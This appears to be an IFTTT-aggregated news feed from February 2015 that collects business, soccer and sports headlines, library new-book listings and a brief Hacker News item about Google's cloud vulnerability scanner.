The editors of Mother Jones are calling for an apology from Fox News over a comment from Bill O'Reilly.



from Business and financial news - CNNMoney.com http://ift.tt/1w6giuL

via IFTTT

Why Venezuela may be the world's worst economy

Here are five reasons why Venezuela's economy is bordering on the edge of lunacy.



from Business and financial news - CNNMoney.com http://ift.tt/1BvBCLt

via IFTTT

MLS Update February 20, 2015 at 08:31AM

Bonus Points: Getting the bang for your buck with your Fantasy MLS picks


The 2015 Fantasy MLS season has kicked off and rosters are beginning to take shape. Managers must allocate $120 million in budget amongst their roster of 18 players. In the first edition of Bonus Points, we're going to dig deep in the numbers to find ways to help stretch that fantasy dollar.


Read More



from MLSsoccer.com News http://ift.tt/1AdeKP1

via IFTTT

Book Release: It will end with us by Savage, Sam, 1940-

"It Will End with Us dismantles the mythic greats of the past--an American South that never was, and a mother's artistic pretensions that never should have been. Sam Savage captures both the frustrations of our degraded world and the tender sympathy it evokes for all our sad efforts to leave something beautiful behind. "--



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Vegas stripped: a Raven McShane novel by Caffrey, Stephanie.

Why this tech party isn't like 1999

The Nasdaq is rapidly approaching all-time highs, raising questions about whether or not another bubble is forming in tech stocks.



from Business and financial news - CNNMoney.com http://ift.tt/1MFmdf5

via IFTTT

MLS Update February 20, 2015 at 08:20AM

American Exports: Tim Howard, Everton host EPL stragglers, Alejandro Bedoya's Nantes face Ligue 1 leaders


AMSTERDAM – Several Americans will take part in key matches overseas this weekend, with Tim Howard and Everton aiming to right their Premier League ship against visiting Leicester City.

All times listed in ET.


ENGLISH PREMIER LEAGUE


Brad Guzan – Aston Villa vs. Stoke City (Saturday, 10 am on Premier League Extra Time)


Read More



from MLSsoccer.com News http://ift.tt/1F4cklA

via IFTTT

Book Release: How to succeed in therapy : navigating the pitfalls on the path to wellness by Scherz, Jared.

Book Release: Home : the chapter book by West, Tracey, 1965- author.

When aliens invade the earth, Tip, a human girl, and Oh, a banished alien, become friends and begin a search for Tip's mother.



Source: Baltimore County Public Library - New Books

via IFTTT

Google releases Cloud-based Web App Vulnerability Scanner and Assessment Tool

Google on Thursday unleashed its own free web application vulnerability scanner tool, which the search engine giant calls Google Cloud Security Scanner, that will potentially scan developers' applications for common security vulnerabilities on its cloud platform more effectively. SCANNER ADDRESSES TWO MAJOR WEB VULNERABILITIES Google launched the Google Cloud Security Scanner in beta. The





from The Hacker News http://ift.tt/1vNWxCd

via IFTTT

Chelsea to invite black man targeted by fans to game

LONDON (AP) Chelsea are planning to invite the black man abused by its supporters at a French metro station before a Champions League game against Paris Saint-Germain this week to its London stadium for the return leg.



from FOX Sports Digital http://ift.tt/1ASi7NC

via IFTTT

Sports Authority said to be at 'high' risk of default

Privately-held Sports Authority could be less than a year away from default on $300 million of its debt according to credit rating agency Moody's.



from Business and financial news - CNNMoney.com http://ift.tt/1ASa2Zb

via IFTTT

Flashback: These 90s jeans are making a comeback

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1F2ydBw

via IFTTT

Starbucks CEO calls out Giuliani for Obama remarks

Starbucks CEO Howard Schultz blasted former New York Mayor Rudy Giuliani for questioning President Obama's "love" for his country.



from Business and financial news - CNNMoney.com http://ift.tt/1F2ycha

via IFTTT

Book Release: The Secret Wisdom of the Earth by Scotton, Christopher.

Timely and timeless, this is a dramatic and deeply moving novel about an act of violence in a small, Southern town and the repercussions that will forever change a young man's view of human cruelty and compassion. After seeing the death of his younger brother in a terrible home accident, fourteen-year-old Kevin and his grieving mother are sent for the summer to live with Kevin's grandfather. In this peeled-paint coal town deep in Appalachia, Kevin quickly falls in with a half-wild hollow kid nam



Source: Baltimore County Public Library - New Books

via IFTTT

Why flying stinks, and you're still paying more

The price of airline tickets is rising faster than inflation, yet we still have to pay to check a bag.



from Business and financial news - CNNMoney.com http://ift.tt/1Ex1Jj9

via IFTTT

Inside the lives of millionaire debt collectors

Inside the lives of millionaire debt collectors



from Business and financial news - CNNMoney.com http://ift.tt/185BXs3

via IFTTT

How I fought Olive Garden (and won)

Activist investor James Mitarotonda looks to breathe new life into struggling companies like Darden by investing large sums of money and forcing major change.



from Business and financial news - CNNMoney.com http://ift.tt/185BVk7

via IFTTT